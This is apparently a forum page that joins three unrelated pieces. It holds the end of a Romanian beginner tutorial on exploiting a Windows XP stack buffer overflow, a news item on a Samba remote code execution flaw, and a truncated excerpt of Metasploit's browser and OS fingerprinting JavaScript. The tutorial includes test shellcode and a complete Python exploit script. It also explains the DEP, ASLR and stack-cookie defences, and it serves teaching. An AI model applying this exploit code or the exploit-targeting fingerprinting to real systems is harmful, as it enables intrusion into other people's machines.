shellcode-ul nostru: un limbaj masina care ne permite sa efectuam o anumita actiune, probabil cele mai folosite astfel de actiuni sunt "Download & Execute", adica infectarea cu un trojan sau altceva, sau "Bind TCP", adica ascultarea pe un port pe care noi, ca atacatori, ne putem conecta ulterior si putem executa comenzi. Cum gasim insa o adresa unde se afla instructiunea jmp esp? Ei bine, aici depinde de voi si de debugger-ul pe care il folositi. Scopul acestui articol este sa intelegeti cum se exploateaza un buffer overflow, nu cum sa folositi un debugger, dar voi face o scurta descriere a acestor programe. In testele facute de mine am folosit Immunity Debugger. Este gratuit, simplu si frumos. Puteti incerca de asemenea OllyDbg, IDA Free sau WinDbg. Un debugger poate deschide un executabil (sau dll), il incarca in memorie, il dezasambleaza (transforma codul masina in cod ASM) si permite debugging-ul, adica permite executarea programului instructiune cu instructiune oferind toate informatiile necesare: - instructiunile care se executa sau care urmeaza sa fie executate - toti registrii (EAX, EBX... EBP, ESP, EIP) - anumite zone de memorie (pe care le doriti) - memory dump - stiva, afisand unde este varful acesteia (ESP) De asemenea, un debugger ofera mai multe functionalitati: - permite setarea unor breakpoint-uri, adica permite sa opriti executia programului la o anumita instructiune - permite vizualizarea DLL-urilor folosite de catre executabil (cele incarcate in memorie) si vizualizarea functiilor exportate (Names) - in cazul in care vreti sa puneti breakpoint pe o anumita functie sunt foarte utile aceste informatii - permite vizualizarea thread-urilor curente, a handle-urilor si multe altele - permite cautari in functie de multe criterii - permite modificarea instructiunilor care urmeaza sa fie executate - permite modificarea valorilor registrilor - permite cam tot ce ar putea fi util Pentru a putea gasi o instructiune "jmp esp", ne vom folosi de doua functionalitati: - vizualizarea codului DLL-urilor - cautarea comenzilor (sau sirurilor binare) in memoria executabilului sau a DLL-urilor In Immunity debugger, pentru a deschide kernel32.dll (toate executabilele incarca in memorie si folosesc DLL-urile kernel32 si ntdll), de exemplu, apasam pe butonul "E" apoi facem dublu click pe kernel32.dll. Daca nu vom gasi un jmp esp in acest DLL, incercam in toate celelalte "module" (.exe sau .dll). Dupa ce s-a deschis, dam click dreapta > Search for > All commands si introducem "jmp esp". Vom vedea apoi o lista cu toate adresele la care gasim acea instructiune. Ei bine, asa se poate face in Immunity, exista mult mai multe metode, in functie de Debugger, alegeti ceea ce vi se pare mai simplu. O alta metoda ar fi Search For > Binary String > "FF E4", adica codul masina care reprezinta instructiunea "jmp esp". In cazul meu, pe Windows XP, am gasit instructiunea "jmp esp" in kernel32.dll la adresa 0x7C86467B, reprezentata in little endian ca 0x7b46867c. Scopul acestui articol este doar de a intelege cum functioneaza si vom folosi un shellcode de teste, un cod masina care afiseaza un simplu mesaj pentru a stii daca am reusit sau nu sa exploatam problema. Pentru teste eu am ales acest shellcode: http://www.exploit-db.com/exploits/28996/ "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42""\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03""\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b""\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e""\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c""\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74""\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe""\x49\x0b\x31\xc0\x51\x50\xff\xd7" Pe intelesul tuturor, cand procesorul va executa acel cod masina pe un sistem Windows, va apela functia "MessageBox" si va afisa un mesaj. Astfel, pentru simplitate, vom scrie codul in Python. Adica din Python vom genera sirul de caractere necesar pentru a apela programul si a executa codul nostru. Exploit-ul scris in Python este urmatorul: #!/usr/bin/pythonimport ctypes import subprocess buffer = "\x41" * 24 buffer += "\x7b\x46\x86\x7c" buffer += ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e" "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c" "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74" "\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe" "\x49\x0b\x31\xc0\x51\x50\xff\xd7") subprocess.call(['C:\\Documents and Settings\\Administrator\\Desktop\\Stack BOF\\StackBOF.exe', buffer]) E destul de usor de inteles ce face pentru ca am explicat anterior: - buffer = "\x41" * 24 - Suprascriem buffer si EBP de pe stack - buffer += "\x7b\x46\x86\x7c" - Suprascriem adresa de return cu adresa unei instructiuni jmp esp (instructiunea se va afla intotdeauna la acea adresa daca nu exista ASLR si daca e vorba despre ACELASI sistem de operare - altfel spus, poate sa difere intre XP SP1, XP SP2 si XP SP3) - buffer += ("\x31\xd2\xb2...\x51\x50\xff\xd7") - Shellcode-ul care afiseaza un mesaj - subprocess.call(...) - Apelam executabilul cu buffer-ul (numit si PAYLOAD) nostru care ne permite sa executam propriul cod Daca nu vi se pare foarte util, incercati sa va ganditi ca aceasta problema poate sa apara in cazuri mai "utile": - la deschiderea unui document (.pdf, .docx, .xlsx) - la citirea unor date pe socket (server FTP, server SSH) - la deschiderea unor pagini web (IE, Firefox) Problema poate sa apara in foarte multe locuri si se poate exploata pentru multe programe. Sa nu aveti insa asteptari prea mari sa descoperiti o astfel de problema in programe importante: Google Chrome, Mozilla, Office Word/Excel, Adobe Reader... Puteti gasi insa probleme mai complicate: Use after free, Type confusion, Heap overflow etc, probleme care sunt insa mult mai dificil de descoperit si de exploatat. Mecanisme de protectie Exsita cateva mecanisme create special pentru a proteja aplicatiile de astfel de probleme. Aceste mecanisme pot fi oferite atat de catre sistemul de operare cat si de catre compilator. DEP - Data Execution Prevention este un mecanism de protectie atat hardware (NX bit) cat si software care NU permite executia de cod din zonele care nu au permisiunile de "execute". O zona/pagina de memorie poate avea permisiuni de "read", "write" si/sau "execute". O zona de date ar avea in mod normal permisiuni de "read" si/sau "write" iar o zona de cod ar avea permisiuni de "read" si "execute". Stiva (read+write) este o zona de memorie de pe care nu ar trebui sa existe posibilitatea de a se executa cod (dar fara DEP exista), iar DEP ofera exact aceasta masura de protectie. Probabil ati inteles mai devreme ca shellcode-ul este pus pe stiva si executat de catre procesor de pe stiva. DEP nu va permite acest lucru. Pentru a activa DEP pe un executabil, din Visual Studio activati optiunea din Configuration > Linker > Advanced > Data Execution Prevention (/NXCOMPAT). ASLR - Address Space Layour Randomization, care a fost introdus in Windows Vista si este motivul pentru care din simplitate am ales sa invatam pe un Windows XP, este o alta metoda de protectie a sistemului de operare impotriva acestor atacuri. Dupa cum ati observat, un proces si DLL-urile folosite de catre acesta sunt incarcate in mod obisnuit la aceeasi adresa de memorie. De aceea exista posibilitatea de a stii cu exactitate la ce adresa de memorie se afla anumite instructiuni (jmp esp de exemplu) pe care le putem folosi in exploatarea unui buffer overflow. ASLR randomizeaza adresele la care sunt incarcate in memorie mai multe elemente cheie ale unui proces: executabilul si DLL-urile, heap-ul si stiva. Astfel este mult mai dificil pentru un atacator sa ghiceasca adresa la care se afla o anumita instructiune pentru a o putea executa. Activarea din Visual Studio se face ca si DEP din Configuration > Linker > Advanced > Randomized Base Address (/DYNAMICBASE). Stack Cookies - Este o alta metoda de protectie oferita de catre compilator care are rolul de a proteja aplicatiile impotriva atacurilor de acest tip prin plasarea pe stiva, la inceputul unei functii, a unei valori aleatoare denumita "stack cookie" (___stack_cookie). Imediat inainte de a pune pe stiva variabilele locale este pusa aceasta valoare aleatoare. Ceea ce intampla de fapt, este faptul ca daca o variabila locala (buffer) este suprascrisa si datele de pe stack sunt suprascrise, atunci va fi suprascrisa si aceasta valoare aleatoare care este verificata imediat inainte de iesirea din functie (inainte de RETN). Daca a fost suprascrisa, executia programului va fi oprita. Este foarte dificil ca un atacator sa ghiceasca exact acea valoare si sa nu o corupa. Atentie! Daca vreti sa faceti teste, dezactivati aceasta optiune din Visual Studio deoarece este activata in mod implicit. Pentru activare sau dezactivare mergeti la Configuration > C/C++ > Code Generation > Buffer Security Check (/GS). Tutorialul se adreseaza incepatorilor, de aceea am ales: - Windows XP pentru ca nu ofera ASLR - Executabilul nu are DEP activat - Executabilul nu are GS (stack cookies) activate Concluzie Desi poate parea foarte usor sa exploatezi o astfel de problema, principala dificultate consta in intelegerea limbajului de asamblare si a anumitor concepte, o exploatare efectiva a unei astfel de probleme este mult mai dificila, tocmai din cauza faptului ca exista mai multe mecanisme de protectie. Exista anumite lucruri care se pot face in anumite cazuri pentru a face "bypass" acestor elemente de protectie, insa dificultatea acestora depaseste scopul acestui material. Sugestia mea pentru voi este sa compilati un astfel de programel, excluzand mecanismele de protectie, si sa incercati sa il exploatati singuri. De asemenea, puteti incerca sa modificati dimensiunea buffer-ului sa vedeti ce se intampla si cel mai important este sa executati pas cu pas fiecare instructiune urmarind stiva pentru a intelege complet aceste notiuni. Lasati acum teoria, puneti mana pe debugger si treceti la treaba! Daca aveti intrebari le astept aici. De asemenea astept pareri legate de acest articol, daca m-am facut inteles, daca e corect tot ce am spus etc. pentru a-l putea perfectiona. Multumesc, Nytro @ Romanian Security Team

Samba hit by remote code execution vulnerability Samba got tangoed By Chris Merriman THE SAMBA PROTOCOL has been flagged as having a major vulnerability that could allow intruders to gain superuser permissions on network devices. Samba is an open source implementation of the SMB protocol used by Microsoft Windows machines to enable file sharing and transfer between machines. Implementations of the SAMBA protocol on machines running other operating systems allow seamless transfer to and from these machines too. A fault in the nmbd NetBIOS name service daemon causes memory operations to be mishandled by Samba. This can provide back doors for hackers to exploit the bug as part of wider attacks. An advisory issued this week under the summary title "Samba 4.0.0 to 4.1.10 are affected by a remote code execution attack on unauthenticated nmbd NetBIOS name services" explained, "A malicious browser can send packets that may overwrite the heap of the target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root)." The problem was discovered and repaired by Volker Lendecke, a Samba Team member working for Sernet in Germany. A patch has been issued to address the problem, along with new Samba versions 4.1.11 and 4.0.21 to correct the problem. The new Samba versions will need to be compiled into new firmware versions for equipment such as NAS drives, and users are advised to avoid any processes involving the NetBIOS nmbd daemon until a fix is put in place. It has been a dark year for software vulnerabilities so far with OpenSSL, Steam, and the perennial favourite Microsoft's Internet Explorer web browser among a string of high profile targets. µ Sursa: Samba hit by remote code execution vulnerability- The Inquirer

Bucata din Metasploit: /** * This can reliably detect browser versions for IE and Firefox even in the * presence of a spoofed User-Agent. OS detection is more fragile and * requires truthful navigator.appVersion and navigator.userAgent strings in * order to be accurate for more than just IE on Windows. **/ // Case matters, see lib/msf/core/constants.rb // All of these should match up with constants in ::Msf::HttpClients clients_opera = "Opera"; clients_ie = "MSIE"; clients_ff = "Firefox"; clients_chrome= "Chrome"; clients_safari= "Safari"; // All of these should match up with constants in ::Msf::OperatingSystems oses_linux = "Linux"; oses_windows = "Microsoft Windows"; oses_mac_osx = "Mac OS X"; oses_freebsd = "FreeBSD"; oses_netbsd = "NetBSD"; oses_openbsd = "OpenBSD"; // All of these should match up with the ARCH_* constants arch_armle = "armle"; arch_x86 = "x86"; arch_x86_64 = "x86_64"; arch_ppc = "ppc"; window.os_detect = {}; /** * This can reliably detect browser versions for IE and Firefox even in the * presence of a spoofed User-Agent. OS detection is more fragile and * requires truthful navigator.appVersion and navigator.userAgent strings in * order to be accurate for more than just IE on Windows. **/ window.os_detect.getVersion = function(){ //Default values: var os_name; var os_flavor; var os_sp; var os_lang; var ua_name; var ua_version; var arch = ""; var useragent = navigator.userAgent; // Trust but verify... var ua_is_lying = false; var version = ""; var unknown_fingerprint = null; var css_is_valid = function(prop, propCamelCase, css) { if (!document.createElement) return false; var d = document.createElement('div'); d.setAttribute('style', prop+": "+css+";") return d.style[propCamelCase] === css; } var input_type_is_valid = function(input_type) { if (!document.createElement) return false; var input = document.createElement('input'); input.setAttribute('type', input_type); return input.type == input_type; } //-- // Client //-- if (window.opera) { ua_name = clients_opera; if (!navigator.userAgent.match(/Opera/)) { ua_is_lying = true; } // This seems to be completely accurate, e.g. "9.21" is the return // value of opera.version() when run on Opera 9.21 ua_version = opera.version(); if (!os_name) { // The 'inconspicuous' argument is there to give us a real value on // Opera 6 where, without it, the return value is supposedly // 'Hm, were you only as smart as Bjorn Vermo...' // though I have not verfied this claim. switch (opera.buildNumber('inconspicuous')) { case "344": // opera-9.0-20060616.1-static-qt.i386-en-344 case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala) case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm case "2474": // Opera 9.63 / Debian Testing (Lenny) case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron) case "6386": // 10.61 os_name = oses_linux; break; case "1074": // Opera 11.50 / Windows XP case "1100": // Opera 11.52 / Windows XP case "3445": // 10.61 case "3516": // Opera 10.63 / Windows XP case "7730": // Opera 8.54 / Windows XP case "8502": // "Opera 9 Eng Setup.exe" case "8679": // "Opera_9.10_Eng_Setup.exe" case "8771": // "Opera_9.20_Eng_Setup.exe" case "8776": // "Opera_9.21_Eng_Setup.exe" case "8801": // "Opera_9.22_Eng_Setup.exe" case "10108": // "Opera_952_10108_en.exe" case "10467": // "Opera_962_en_Setup.exe" case "10476": // Opera 9.63 / Windows XP case "WMD-50433": // Windows Mobile - "Mozilla/5.0 (Windows Mobile; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.00" os_name = oses_windows; break; case "2480": // Opera 9.64 / FreeBSD 7.0 os_name = oses_freebsd; break; case "6386": // 10.61 os_name = oses_mac_osx; break; case "1407": // In the case of mini versions, the UA is quite a bit // harder to spoof, so it's correspondingly easier to // trust. Unfortunately, despite being fairly truthful in // what OS it's running on, Opera mini seems to lie like a // rug in regards to the browser version. // // iPhone, iOS 5.0.1 // Opera/9.80 (iPhone; Opera Mini/7.1.32694/27.1407; U; en) Presto/2.8.119 Version/11.10.10 // Android 2.3.6, opera mini 7.1 // Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10 if (navigator.userAgent.indexOf("Android")) { os_name = oses_linux; os_flavor = "Android"; } else if (navigator.userAgent.indexOf("iPhone")) { os_name = oses_mac_osx; os_flavor = "iPhone"; } break; // A few are ambiguous, record them here case "1250": // Opera 9.80 / Windows XP // Opera 11.61 / Windows XP // Opera 11.61 / Debian 4.0 (Etch) break; default: unknown_fingerprint = opera.buildNumber('inconspicuous'); break; } } } else if (typeof window.onmousewheel != 'undefined' && ! (typeof ScriptEngineMajorVersion == 'function') ) { // IE 10 now has onmousewheel // Then this is webkit, could be Safari or Chrome. // Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 // Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5 // Mozilla/5.0 (Linux; U; Android 2.2; en-au; GT-I9000 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 // Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8C148 // Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405 // Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 // Google Chrome has window.google (older versions), window.chromium (older versions), and window.window.chrome (3+) if (window.chromium || window.google || window.chrome) { ua_name = clients_chrome; search = "Chrome"; } else { ua_name = clients_safari; search = "Version"; } platform = navigator.platform.toLowerCase(); // Just to be a pain, iPod and iPad both leave off "Safari" and // "Version" in the UA, see example above. Grab the webkit version // instead. =/ if (platform.match(/ipod/)) { os_name = oses_mac_osx; os_flavor = "iPod"; arch = arch_armle; search = "AppleWebKit"; } else if (platform.match(/ipad/)) { os_name = oses_mac_osx; os_flavor = "iPad"; arch = arch_armle; search = "AppleWebKit"; } else if (platform.match(/iphone/)) { os_name = oses_mac_osx; os_flavor = "iPhone"; arch = arch_armle; } else if (platform.match(/macintel/)) { os_name = oses_mac_osx; arch = arch_x86; } else if (platform.match(/linux/)) { os_name = oses_linux; if (platform.match(/x86_64/)) { arch = arch_x86_64; } else if (platform.match(/arm/)) { // Android and maemo arch = arch_armle; if (navigator.userAgent.match(/android/i)) { os_flavor = 'Android'; } } } else if (platform.match(/windows/)) { os_name = oses_windows; } ua_version = this.searchVersion(search, navigator.userAgent); if (!ua_version || 0 == ua_version.length) { ua_is_lying = true; } } else if (navigator.oscpu && !document.all && navigator.taintEnabled || 'MozBlobBuilder' in window) { // Use taintEnabled to identify FF since other recent browsers // implement window.getComputedStyle now. For some reason, checking for // taintEnabled seems to cause IE 6 to stop parsing, so make sure this // isn't IE first. // Also check MozBlobBuilder because FF 9.0.1 does not support taintEnabled // Then this is a Gecko derivative, assume Firefox since that's the // only one we have sploits for. We may need to revisit this in the // future. This works for multi/browser/mozilla_compareto against // Firefox and Mozilla, so it's probably good enough for now. ua_name = clients_ff; // Thanks to developer.mozilla.org "Firefox for developers" series for most // of these. // Release changelogs: http://www.mozilla.org/en-US/firefox/releases/ if (css_is_valid('flex-wrap', 'flexWrap', 'nowrap')) { ua_version = '28.0'; } else if (css_is_valid('cursor', 'cursor', 'grab')) { ua_version = '27.0'; } else if (css_is_valid('image-orientation', 'imageOrientation', '0deg')) { ua_version = '26.0'; } else if (css_is_valid('background-attachment', 'backgroundAttachment', 'local')) { ua_version = '25.0'; } else if ('DeviceStorage' in window && window.DeviceStorage && 'default' in window.DeviceStorage.prototype) { // https://bugzilla.mozilla.org/show_bug.cgi?id=874213 ua_version = '24.0'; } else if (input_type_is_valid('range')) { ua_version = '23.0'; } else if ('HTMLTimeElement' in window) { ua_version = '22.0'; } else if ('createElement' in document && document.createElement('main') && document.createElement('main').constructor === window['HTMLElement']) { ua_version = '21.0'; } else if ('imul' in Math) { ua_version = '20.0'; } else if (css_is_valid('font-size', 'fontSize', '23vmax')) { ua_version = '19.0'; } else if ('devicePixelRatio' in window) { ua_version = '18.0'; } else if ('createElement' in document && document.createElement('iframe') && 'sandbox' in document.createElement('iframe')) { ua_version = '17.0'; } else if ('mozApps' in navigator && 'install' in navigator.mozApps) { ua_version = '16.0'; } else if ('HTMLSourceElement' in window && HTMLSourceElement.prototype && 'media' in HTMLSourceElement.prototype) { ua_version = '15.0'; } else if ('mozRequestPointerLock' in document.body) { ua_version = '14.0'; } else if ('Map' in window) { ua_version = "13.0"; } else if ('mozConnection' in navigator) { ua_version = "12.0"; } else if ('mozVibrate' in navigator) { ua_version = "11.0"; } else if (css_is_valid('-moz-backface-visibility', 'MozBackfaceVisibility', 'hidden')) { ua_version = "10.0"; } else if ('doNotTrack' in navigator) { ua_version = "9.0"; } else if ('insertAdjacentHTML' in document.body) { ua_version = "8.0"; } else if ('ondeviceorientation' in window && !('createEntityReference' in document)) { ua_version = "7.0"; } else if ('MozBlobBuilder' in window) { ua_version = "6.0"; } else if ('isGenerator' in Function) { ua_version = "5.0"; } else if ('isArray' in Array) { ua_version = "4.0"; } else if (document.readyState) { ua_version = "3.6"; } else if (String.trimRight) { ua_version = "3.5"; } else if (document.getElementsByClassName) { ua_version = "3"; } else if (window.Iterator) { ua_version = "2"; } else if (Array.every) { ua_version = "1.5"; } else { ua_version = "1"; } if (navigator.oscpu != navigator.platform) { ua_is_lying = true; } // oscpu is unaffected by changes in the useragent and has values like: // "Linux i686" // "Windows NT 6.0" // haven't tested on 64-bit Windows version = navigator.oscpu; if (version.match(/i.86/)) { arch = arch_x86; } if (version.match(/x86_64/)) { arch = arch_x86_64; } if (version.match(/Windows/)) { os_name = oses_windows; switch(version) { case "Windows NT 5.0": os_flavor = "2000"; break; case "Windows NT 5.1": os_flavor = "XP"; break; case "Windows NT 5.2": os_flavor = "2003"; break; case "Windows NT 6.0": os_flavor = "Vista"; break; case "Windows NT 6.1": os_flavor = "7"; break; case "Windows NT 6.2": os_flavor = "8"; break; } } if (version.match(/Linux/)) { os_name = oses_linux; } // end navigator.oscpu checks // buildID is unaffected by changes in the useragent and typically has // the compile date which in some cases can be used to map to specific // Version & O/S (including Distro and even Arch). Depending upon the // buildID, sometime navigator.productSub will be needed. // // This technique, and the laboriously compiled associated table, // submitted by Mark Fioravanti. var buildid = navigator.buildID; switch(buildid) { case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008052906": ua_version = "3.0.0"; os_name = oses_windows; break; case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008052912": ua_version = "3.0.0"; os_name = oses_linux; break; case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2008070205": ua_version = "2.0.0.16"; os_name = oses_windows; break; case "2008070206": ua_version = "3.0.1"; os_name = oses_linux; break; case "2008070208": ua_version = "3.0.1"; os_name = oses_windows; break; case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008072820": switch (navigator.productSub) { case "2008072820": ua_version = "3.0.1"; os_name = oses_linux; break; case "2008092313": ua_version = "3.0.2"; os_name = oses_linux; break; } break; case "2008082909": ua_version = "2.0.0.17"; os_name = oses_windows; break; case "2008091618": ua_version = "3.0.2"; os_name = oses_linux; break; case "2008091620": ua_version = "3.0.2"; os_name = oses_windows; break; case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008092416": ua_version = "3.0.3"; os_name = oses_linux; break; case "2008092417": ua_version = "3.0.3"; os_name = oses_windows; break; case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008101315": switch (navigator.productSub) { case "2008101315": ua_version = "3.0.3"; os_name = oses_linux; break; case "2008111318": ua_version = "3.0.4"; os_name = oses_linux; arch = arch_x86; break; } break; case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break; case "2008102920": ua_version = "3.0.4"; break; case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny) case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break; case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break; case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break; case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron) case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break; case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break; case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break; case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009021906": ua_version = "3.0.7"; os_name = oses_linux; break; case "2009021910": ua_version = "3.0.7"; os_name = oses_windows; break; case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009032608": ua_version = "3.0.8"; os_name = oses_linux; break; case "2009032609": ua_version = "3.0.8"; os_name = oses_windows; break; case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009033100": switch (navigator.productSub) { case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "2009040820": ua_version = "3.0.9"; os_name = oses_linux; break; case "2009040821": ua_version = "3.0.9"; os_name = oses_windows; break; case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; case "2009042315": ua_version = "3.0.10"; os_name = oses_linux; break; case "2009042316": ua_version = "3.0.10"; os_name = oses_windows; break; case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break; case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break; case "2009060214": ua_version = "3.0.11"; os_name = oses_linux; break; case "2009060215": ua_version = "3.0.11"; os_name = oses_windows; break; case "2009060308": switch (navigator.productSub) { case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; } break; case "2009060309": switch (navigator.productSub) { case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; } break; case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "BackTrack"; break; case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "PCLunixOS"; break; case "20090624012136": ua_version = "3.5.0"; os_name = oses_mac_osx; break; case "20090624012820": ua_version = "3.5.0"; os_name = oses_linux; break; case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break; case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break; case "2009070610": ua_version = "3.0.12"; os_name = oses_linux; break; case "2009070611": ua_version = "3.0.12"; os_name = oses_windows; break; case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "20090715083437": ua_version = "3.5.1"; os_name = oses_mac_osx; break; case "20090715083816": ua_version = "3.5.1"; os_name = oses_linux; break; case "20090715094852": ua_version = "3.5.1"; os_name = oses_windows; break; case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Oracle"; break; case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "CentOS"; break; case "20090729211433": ua_version = "3.5.2"; os_name = oses_mac_osx; break; case "20090729211829": ua_version = "3.5.2"; os_name = oses_linux; break; case "20090729225027": ua_version = "3.5.2"; os_name = oses_windows; break; case "2009073021": ua_version = "3.0.13"; os_name = oses_linux; break; case "2009073022": ua_version = "3.0.13"; os_name = oses_windows; break; case "20090824085414": ua_version = "3.5.3"; os_name = oses_mac_osx; break; case "20090824085743": ua_version = "3.5.3"; os_name = oses_linux; break; case "20090824101458": ua_version = "3.5.3"; os_name = oses_windows; break; case "2009082707": ua_version = "3.0.14"; break; case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break; case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break; case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break; case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86 case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "2009101600": switch (navigator.productSub) { case "2009101600": ua_version = "3.0.15"; break; // Can be either Mac or Linux case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "SUSE"; arch = arch_x86; break; } break; case "2009101601": ua_version = "3.0.15"; os_name = oses_windows; break; case "20091016081620": ua_version = "3.5.4"; os_name = oses_mac_osx; break; case "20091016081727": ua_version = "3.5.4"; os_name = oses_linux; break; case "20091016092926": ua_version = "3.5.4"; os_name = oses_windows; break; case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64 case "2009102814": switch (navigator.productSub) { case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break; case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Mint"; break; case "2010021501": 